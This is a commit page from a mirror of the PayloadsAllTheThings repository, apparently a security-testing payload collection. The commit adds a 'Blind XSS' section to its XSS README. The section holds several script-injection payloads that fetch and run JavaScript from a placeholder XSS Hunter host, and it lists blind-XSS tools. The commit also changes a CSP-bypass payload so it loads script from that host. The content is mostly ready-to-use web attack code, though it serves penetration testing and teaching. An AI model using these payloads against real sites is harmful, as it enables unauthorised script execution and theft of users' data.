ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Blind XSS - XSS Hunter, Sleepy Puppy etc

Browse Source
This commit is contained in:
Swissky 2018-11-18 15:37:01 +01:00
parent fd99da6c06
commit a0f8e846fa
1 changed files with 27 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
XSS injection/README.md
View File

@ -7,6 +7,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [Blind XSS](#blind-xss)
- [Polyglot XSS](#polyglot-xss) - [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [CSP Bypass](#csp-bypass) - [CSP Bypass](#csp-bypass)
@ -299,6 +300,31 @@ div {
</html> </html>
``` ```
## Blind XSS
### XSS Hunter
Available at [https://xsshunter.com/app](https://xsshunter.com/app)
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
```javascript
"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>
```
### Other tools for Blind XSS
- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy)
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS)
- [BlueLotus_XSSReceiver - FiresunCN](https://github.com/firesunCN/BlueLotus_XSSReceiver)
- [ezXSS - ssl](https://github.com/ssl/ezXSS)
## Polyglot XSS ## Polyglot XSS
Polyglot XSS - 0xsobky Polyglot XSS - 0xsobky
@ -751,7 +777,7 @@ window.frames[0].document.head.appendChild(script);
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://swk.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)